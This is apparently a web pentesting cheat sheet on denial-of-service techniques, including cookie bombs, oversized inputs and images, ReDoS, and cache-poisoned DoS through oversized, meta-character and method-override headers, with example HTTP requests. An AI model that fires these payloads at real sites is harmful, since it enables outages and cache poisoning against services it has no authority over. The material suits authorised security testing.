Denial of Service
Cookie bomb
<https://target.com/index.php?param1=xxxxxxxxxxxxxx>
After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
Long payload at form
Try input a very long payload to form. For example using very long password or using very long email
POST /register HTTP/1.1
Host: target.com
...
username=victim&password=aaaaaaaaaaaaaaa
Pixel flood
Using image with a huge pixels
Download the payload: Here
Frame flood, using GIF with a huge frame
Download the payload: Here
Image parameters
Sometimes in website we found a parameter that can adjust the size of the image, for example
<https://target.com/img/vulnerable.jpg?width=500&height=500>
Try change "500" to "99999999999"
<https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999>
Changing the value of the header
Accept-Encoding: gzip, gzip, deflate, br, br
ReDoS (Regex DoS)
A Regular Expression Denial of Service (ReDoS) happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.
CPDoS
HTTP Header Oversize (HHO)
A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache
GET /index.html HTTP/1.1
Host: victim.com
X-Oversized-Header-1: Big_Value
...
The response is
HTTP/1.1 400 Bad Request
...
Header size exceeded
HTTP Meta Character (HMC)
this attack tries to bypass a cache with a request header containing a harmful meta character. Meta characters can be, e.g., control characters such as line break/carriage return (\n), line feed (\r) or bell (\a).
GET /index.html HTTP /1.1
Host: victim.com
X-Meta-Malicious-Header: \\\\r\\\\n
...
The response is
HTTP/1.1 400 Bad Request
...
Character not allowed
HTTP Method Override (HMO)
There are several headers present in HTTP Standard that allow modifying overriding the original HTTP header. Some of these headers are:
1. X-HTTP-Method-Override
2. X-HTTP-Method
3. X-Method-Override
The header instructs the application to override the HTTP method in request.
GET /index.php HTTP/1.1
Host: victim.com
X-HTTP-Method-Override: POST
...
The response is
HTTP/1.1 404 Not Found
...
POST on /index.php not found
X-Forwarded-Port
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Port: 123
...
X-Forwarded-Host
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Host: www.hackerone.com:123
...
!https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png
References
Last updated